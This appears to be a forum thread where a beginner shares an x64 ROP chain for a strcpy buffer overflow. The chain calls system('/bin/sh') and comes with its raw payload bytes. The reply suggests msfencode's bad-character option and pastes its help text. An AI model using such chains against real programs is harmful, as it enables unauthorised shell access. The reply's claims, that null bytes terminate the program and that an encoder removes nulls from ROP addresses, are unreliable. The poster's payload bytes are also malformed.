So I have this ROP chain for x64 architecture:
0x0000000000400b60: pop rdi; ret;
0x482cf5 0x68732f6e69622f ('/bin/sh')
0x401550 <system>
In Payload:
\x60\x0b\40\x00\x00\x00\x00\x00\xf5\x2c\x48\x50\x15\x40
How should I get rid of 0? Since my buffer is overflown with strcpy and it stops on 0.
Any precise answer or general advices?
My effort was to build this ROP chain. Unfortunately, I am beginner, so I got stuck at this point.
Thanks,
Use msfencode: https://www.offensive-security.com/metasploit-unleashed/msfencode/
The 0's you're talking about are null bytes, which are essentially terminators. When ever the program encounters a null byte, the program is terminated. Using msgencode you can use the -b option to avoid the usage of null bytes.
In addition you might want to avoid other characters as well suchs 0x0A and 0x0D which are line breaks.
root@kali:~# msfencode -h
Usage: /usr/bin/msfencode >options>
OPTIONS:
-a >opt> The architecture to encode as
-b >opt> The list of characters to avoid: '\x00\xff'
-c >opt> The number of times to encode the data
-d >opt> Specify the directory in which to look for EXE templates
-e >opt> The encoder to use
-h Help banner
-i >opt> Encode the contents of the supplied file path
-k Keep template working; run payload in new thread (use with -x)
-l List available encoders
-m >opt> Specifies an additional module search path
-n Dump encoder information
-o >opt> The output file
-p >opt> The platform to encode for
-s >opt> The maximum size of the encoded data
-t >opt> The output format: bash,c,csharp,dw,dword,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,dll,elf,exe,exe-only,exe-service,exe-small,loop-vbs,macho,msi,msi-nouac,psh,psh-net,psh-reflection,vba,vba-exe,vbs,war
-v Increase verbosity
-x >opt> Specify an alternate executable template
